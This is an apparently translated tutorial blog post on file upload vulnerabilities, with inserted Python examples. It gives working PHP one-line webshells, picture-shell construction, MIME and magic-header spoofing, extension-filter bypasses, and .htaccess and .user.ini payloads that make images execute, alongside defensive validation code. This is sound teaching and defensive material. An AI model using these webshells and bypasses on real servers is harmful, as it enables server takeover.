File upload vulnerability summary
2022-07-07 04:50:00 【-*Xiao Kai】
Contents
Front-end validation (client-side JavaScript check)
Back-end validation (server-side check)
Server-side MIME type validation (file content type detection)
Server-side file content validation (file header / magic bytes)
Server-side file extension validation
Note: beginner's notes, use with discretion.
Principle
During development the files uploaded by users are not strictly checked or filtered, so a user can upload an executable script file (a malicious file), and as a result commands get executed on the server.
Harm
Gain control of the server
Upload a file with the same name to overwrite an existing file
Directory traversal through the uploaded filename
Denial of service (DoS) attacks, and so on
webshell (web Trojan file)
The most common use of a file upload vulnerability is to upload a website Trojan (webshell). A webshell, also called a web Trojan file, is named after the language it is written in: ASP Trojan, PHP Trojan, JSP Trojan and so on. It uses the scripting language's command execution and file read/write functions; once uploaded to the server and parsed by the script engine, the attacker controls the server.
Webshells are divided into big shells (大马), small shells (小马, the one-liner Trojans) and picture shells (图片马).
Big shell (大马)
Full-featured, but the code is large and relatively complex, so it is hard to hide; it usually needs encryption or other obfuscation to evade detection.
Small shell (小马)
Simple functionality, little code, strong concealment.
Picture shell (图片马)
Used when the site only allows image uploads (.png .jpg .gif) and the check cannot be bypassed otherwise.
Making a picture shell: in cmd run: copy picture.jpg /b + trojan.php /a picture.jpg (/b copies the image as binary, /a copies the script as text; the script is appended after the image data, so the file still starts with a valid image header).
Front-end validation (client-side JavaScript check)
Mainly checks the file extension, roughly divided into:
Blacklist: extensions that are not allowed to be uploaded
Whitelist: extensions that are allowed to be uploaded
When the restriction is only enforced in the front end, you can simply modify the page code.
eg: lay-data="{url: 'upload.php', accept: 'images', exts: 'png'}" changed to: lay-data="{url: 'upload.php', accept: 'file'}"
Front-end validation bypasses
Disable JavaScript in the browser settings
Intercept and modify the request with Burp Suite (for example, upload a 1.jpg file, capture the request and change the filename to 1.php)
Back-end validation (server-side check)
Server-side MIME type validation (file content type detection)
MIME type is the Internet standard for describing the content type of a message.
This check mainly looks at the Content-Type header of the uploaded file part.
When the declared content type is restricted, change the Content-Type sent with the file (application/octet-stream, application/x-php and so on) to one of:
Content-Type: image/jpeg
Content-Type: image/png
Content-Type: image/gif
The Content-Type is set by the client, so it says nothing reliable about what the file actually contains.
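The Burp edit described above (rename 1.jpg to 1.php, rewrite Content-Type to image/jpeg) and the weak server-side check it defeats, as an added Python example that is not part of the original page. The multipart builder and parser are minimal hand-written helpers, the shell payload and boundary string are constructed sample values, and mime_only_check stands in for a server that trusts the declared Content-Type.

```python
"""Forge the upload request a browser would send, the way Burp Suite is used
on this page: filename and Content-Type are client-supplied strings, so a
server that checks only Content-Type accepts a PHP file."""
from typing import Dict

SHELL = b"<?php @eval($_POST['pass']); ?>"      # constructed one-line shell
BOUNDARY = "----FormBoundaryExample"             # hypothetical boundary value


def build_upload(filename: str, content_type: str, data: bytes,
                 field: str = "file", boundary: str = BOUNDARY) -> bytes:
    """Build a single-file multipart/form-data body. Nothing in it is
    verified by the browser; an intercepting proxy can set any values."""
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        f"Content-Type: {content_type}\r\n"
        "\r\n"
    ).encode()
    return head + data + f"\r\n--{boundary}--\r\n".encode()


def parse_upload(body: bytes, boundary: str = BOUNDARY) -> Dict[str, object]:
    """Minimal server-side view of that body: filename, declared type, bytes."""
    part = body.split(f"--{boundary}".encode())[1]      # the single file part
    header_blob, _, payload = part.partition(b"\r\n\r\n")
    headers = {}
    for line in header_blob.decode().strip().splitlines():
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    filename = headers["content-disposition"].split('filename="')[1].split('"')[0]
    if payload.endswith(b"\r\n"):
        payload = payload[:-2]                            # CRLF before closing delimiter
    return {"filename": filename,
            "content_type": headers["content-type"],
            "data": payload}


ALLOWED_MIME = {"image/jpeg", "image/png", "image/gif"}


def mime_only_check(upload: Dict[str, object]) -> bool:
    """The weak server-side check from this section: trust the declared type."""
    return upload["content_type"] in ALLOWED_MIME


def bypass_demo() -> Dict[str, object]:
    """What the Burp edit does: the file picked as 1.jpg is renamed to 1.php
    in the request and its Content-Type is rewritten to image/jpeg."""
    honest = build_upload("1.jpg", "image/jpeg", b"\xff\xd8\xff\xe0 real image")
    forged = build_upload("1.php", "image/jpeg", SHELL)   # was application/octet-stream
    return {"honest_ok": mime_only_check(parse_upload(honest)),
            "forged_ok": mime_only_check(parse_upload(forged)),
            "forged": parse_upload(forged)}


if __name__ == "__main__":
    result = bypass_demo()
    print(result["forged"]["filename"], result["forged"]["content_type"],
          "accepted" if result["forged_ok"] else "rejected")
```

Both requests pass mime_only_check, which is the whole point: the only thing the server can trust is the bytes it received, so the checks in the next two sections (file header, extension) have to be done on the stored name and content, never on this header.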
Server-side file content validation (file header)
The back end inspects the content of the uploaded file.
Image format checks read the bytes at the beginning of the file; each picture type has its own file header (magic bytes).
Bypass methods:
1. Prepend a file magic header to the file to fake image content.
Common magic header: GIF89a
JPG: FF D8 FF E0 00 10 4A 46 49 46 (FF D8 FF is the JPEG start marker, 4A 46 49 46 is "JFIF")
GIF: 47 49 46 38 39 61 ("GIF89a")
PNG: 89 50 4E 47 ("\x89PNG", followed by 0D 0A 1A 0A)
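The two ways of building a picture shell on this page (prepending a magic header, and the copy /b + /a concatenation from the webshell section) run against the kind of leading-bytes check a server does, as an added Python example that is not part of the original page. The shell payload is a constructed one-liner, TINY_GIF is a constructed but valid 1x1 GIF standing in for picture.jpg, and the SIGNATURES table is my assumption of what a simple header sniff compares against.

```python
"""Build the 'picture shell' (图片马) two ways, run it through a header-only
check, then apply the extra check a defender needs because the header check
passes it."""
from typing import Optional

# Magic headers as listed on the page (JPEG shown with its JFIF APP0 segment).
MAGIC = {
    "gif": b"GIF89a",
    "jpg": b"\xff\xd8\xff\xe0\x00\x10JFIF",
    "png": b"\x89PNG\r\n\x1a\n",
}
# What a leading-bytes check compares against (assumed shortest prefixes).
SIGNATURES = {"gif": (b"GIF87a", b"GIF89a"),
              "jpg": (b"\xff\xd8\xff",),
              "png": (b"\x89PNG\r\n\x1a\n",)}

SHELL = b"<?php @eval($_POST['pass']); ?>"   # constructed one-line shell
# Constructed, genuinely valid 1x1 GIF (35 bytes) standing in for picture.jpg.
TINY_GIF = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
            b",\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;")


def prepend_magic(kind: str, shell: bytes = SHELL) -> bytes:
    """Bypass 1 from the page: no real image, just the magic header in front."""
    return MAGIC[kind] + shell


def append_to_image(image: bytes, shell: bytes = SHELL) -> bytes:
    """What `copy picture.jpg /b + trojan.php /a out.jpg` produces:
    the intact image followed by the script."""
    return image + shell


def sniff_image_type(data: bytes) -> Optional[str]:
    """Server-side 'file header' check: looks only at the first bytes."""
    for kind, sigs in SIGNATURES.items():
        if data.startswith(sigs):
            return kind
    return None


def contains_php_tags(data: bytes) -> bool:
    """The check the header sniff does not do: scan the whole file for PHP
    open tags. Cheap, and enough to catch the pictures built above."""
    lowered = data.lower()
    return (b"<?php" in lowered or b"<?=" in lowered
            or b"<script language" in lowered)


if __name__ == "__main__":
    for label, blob in (("magic+shell", prepend_magic("gif")),
                        ("image+shell", append_to_image(TINY_GIF)),
                        ("clean image", TINY_GIF)):
        print(f"{label}: sniffed as {sniff_image_type(blob)}, "
              f"php tags: {contains_php_tags(blob)}")
```

Both shells sniff as gif, which is why the header check alone is insufficient. The tag scan catches these particular files but is easy to evade (encoding, short tags, splitting the tag across chunks), so the real fix is to re-encode uploaded images server-side, which discards everything after the image data, and to store uploads where the script engine never runs.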
2. Because the server still treats the uploaded Trojan as an image, requesting it directly only returns the "image"; the embedded command is not executed.
So a file inclusion vulnerability is exploited: including the image-format file makes it parsed and executed as PHP, for example
.php?filename=uploads/1.jpg&pass=system('cat /flag')
(this assumes the vulnerable page includes the file named by the filename parameter and that 1.jpg carries a one-liner that evaluates pass).
Server-side file extension validation
The back end filters the file by its extension; disallowed suffixes are rejected.
Bypass methods:
Extension case: .PHP, .Php (works when the filter compares case-sensitively but the server maps extensions case-insensitively)
Equivalent extension substitution:
php: php, phtml, php3, php4, php5; jsp: jspx, jspf; asp: asa, cer, aspx; ext: exee
Double-writing bypass (when the filter deletes the string "php" once): php -> pphphp, which becomes php after the deletion
Commonly used
.htaccess
Reference: original article: 深入探究用户利用.htaccess篡改配置引发的安全问题 (合天网安实验室, CSDN blog)
The .htaccess file (or "distributed configuration file"), full name Hypertext Access, provides a way to change configuration per directory: place a file containing one or more directives in a particular document directory and they apply to that directory and all of its subdirectories. As an ordinary user the directives available are limited; the administrator decides which are honoured with Apache's AllowOverride directive (SetHandler and AddType need the FileInfo override to be allowed). Put simply, .htaccess is an Apache configuration file that only governs the web pages under its own directory.
What a .htaccess file can do:
301 redirects
custom 404 error pages
change how file extensions are handled
disable directory listings, and so on
So you can upload a .htaccess file with the following content (parse any file whose name contains s1mple as PHP):
<FilesMatch "s1mple">
SetHandler application/x-httpd-php
</FilesMatch>
or (parse .jpg files as PHP):
AddType application/x-httpd-php .jpg
.user.ini
Reference: 文件上传 .htaccess 与 .user.ini (m0_46587008's CSDN blog)
.user.ini applies more widely than .htaccess: whether the web server is nginx, Apache or IIS, it works as long as PHP runs in CGI/FastCGI mode (php-fpm, for example).
What .user.ini does: it sets per-directory PHP INI options, including which file is included before or after every script in that directory, so it is more broadly usable, but it has one extra (important) condition: there must be an existing PHP file in that directory that gets requested, because the directives only take effect when a PHP script in the directory runs (PHP also caches them for user_ini.cache_ttl seconds, 300 by default, so the change may not apply at once). The two configuration lines are:
auto_prepend_file=a.jpg   (include the "image" before the script)
auto_append_file=a.jpg    (include the "image" after the script)
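The extension bypasses collected above (case, equivalent extensions, double writing, and the .htaccess / .user.ini configuration files that a naive filter lets through) against the filter they target, beside a whitelist validator that withstands them, as an added Python example that is not part of the original page. BLACKLIST, WHITELIST and SIGNATURE are my assumed lists; weak_filter is my reconstruction of the "delete php once, deny a few extensions" style of handler the bypasses presuppose, not any specific project's code.

```python
"""Extension checks: the naive blacklist filter this page's bypasses are
aimed at, beside a whitelist validator that survives them."""
import os
import secrets
from typing import Optional

BLACKLIST = {".php", ".jsp", ".asp"}            # assumed naive deny list
WHITELIST = {".jpg", ".jpeg", ".png", ".gif"}   # assumed allow list
SIGNATURE = {".jpg": b"\xff\xd8\xff", ".jpeg": b"\xff\xd8\xff",
             ".png": b"\x89PNG\r\n\x1a\n", ".gif": b"GIF8"}


def weak_filter(filename: str) -> Optional[str]:
    """Naive handler: case-sensitive deny list on the extension, then
    'sanitise' by deleting the string php once. Returns the stored name,
    or None if rejected."""
    ext = os.path.splitext(filename)[1]           # ".PHP" != ".php" here
    if ext in BLACKLIST:
        return None
    return filename.replace("php", "", 1)         # 1.pphphp -> 1.php


def strict_validate(filename: str, content: bytes) -> Optional[str]:
    """Whitelist validator: decide from the last extension (lower-cased),
    refuse dotfiles and control characters, require the leading bytes to
    match the claimed type, and store under a server-generated name."""
    name = os.path.basename(filename.replace("\\", "/"))   # drop path parts
    if not name or name.startswith(".") or any(ord(c) < 32 for c in name):
        return None                    # .htaccess, .user.ini, 1.php%00.jpg
    ext = os.path.splitext(name)[1].lower()
    if ext not in WHITELIST or not content.startswith(SIGNATURE[ext]):
        return None
    # The user's name is never reused: no double extensions, no overwrites.
    return secrets.token_hex(8) + ext


if __name__ == "__main__":
    for attempt in ("1.PHP", "1.pphphp", "1.phtml", ".htaccess", ".user.ini"):
        print(f"{attempt!r}: weak -> {weak_filter(attempt)!r}, "
              f"strict -> {strict_validate(attempt, b'GIF89a')!r}")
```

Every bypass on the list gets stored by weak_filter and refused by strict_validate. The generated storage name also removes the Apache multiple-extension problem (a stored 1.php.jpg can be run as PHP by a mod_mime AddHandler configuration) and the same-name overwrite listed under Harm; the stored file should still live in a directory where the script engine is disabled.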
A common one-liner shell:
<?php @eval($_POST["pass"]);?>
<script language='php'>assert($_REQUEST['pass'])</script>
<script language="php">eval($_POST['pass'])</script>
<script language="php">eval($_REQUEST['pass'])</script>
Note that the <script language="php"> tag only works on PHP 5 and earlier (it was removed in PHP 7.0), and assert() no longer evaluates string arguments as code from PHP 8.0.